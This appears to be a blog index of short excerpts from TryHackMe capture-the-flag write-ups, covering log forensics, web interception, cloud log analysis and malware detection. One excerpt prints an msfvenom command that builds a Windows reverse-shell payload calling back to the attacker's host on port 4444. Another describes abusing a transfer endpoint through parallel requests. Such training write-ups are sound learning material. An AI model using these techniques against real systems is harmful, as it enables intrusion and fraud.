TryHackMe

Lab link. Questions 1. On what day was Glitch_Malware last logged in? Answer format: DD/MM/YYYY 07/11/2024 2. What event ID shows the login of the Glitch_Malware user? 4624 3. Read the PowerShell history of the Administrator account. What was the command that was used to enumerate Active Directory users? notepad “$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt” Get-ADUser -Filter * -Properties …

Lab link. Questions 1. What is the name of the CA that has signed the Gift Scheduler certificate? THM 2. Look inside the POST requests in the HTTP history. What is the password for the snowballelf account? c4rrotn0s3 3. Use the credentials for any of the elves to authenticate to the Gift Scheduler website. What is the …

Lab link. Questions 1. What is the value of Flag1? 2. What is the value of Flag2?

Lab link. 1. What is the flag value after transferring over $2000 from Glitch’s account? We send the POST /transfer request to the repeater. I wanted to send 500 dollars, so I multiplied the request so much that it exceeded 2000 dollars. Then, I made a requests group and sent it as a parallel. Then …

Lab link. Lab Summary Wi-Fi is the technology that connects our devices to the internet wirelessly. A router connects our devices to the internet via Wi-Fi. To connect to the router, our devices create an SSID (Wi-Fi network name) list and join the network by entering a password (PSK – Pre-Shared Key). WPA/WPA2 uses a …

Lab link. Questions 1. What does GRC stand for? 2. What is the flag you receive after performing the risk assessment? Vendor 1Azure Falcon Vendor 2Indigo Dragon Vendor 3Sapphire Wyrm

Lab link. Questions 1. What is the flag value once Glitch gets reverse shell on the digital vault using port 4444? Note: The flag may take around a minute to appear in the C:\Users\glitch\Desktop directory. You can view the content of the flag by using the command type C:\Users\glitch\Desktop\flag.txt. msfvenom -p windows/x64/shell_reverse_tcp LHOST=Your_IP LPORT=4444 -f powershell Let’s copy …

Lab link. Questions 1. What is the other activity made by the user glitch aside from the ListObject action? PutObject 2. What is the source IP related to the S3 bucket activities of the user glitch? 53.94.201.69 3. Based on the eventSource field, what AWS service generates the ConsoleLogin event? signin.amazonaws.com 4. When did the …

Lab link. Questions 1. What is the flag displayed in the popup window after the EDR detects the malware? We open powershell and go to the directory to run the YARA rule in the example. cd C:\Tools .\JingleBells.ps1 We go to the location of the MerryChristmas.exe file, execute it (by clicking on it twice) and …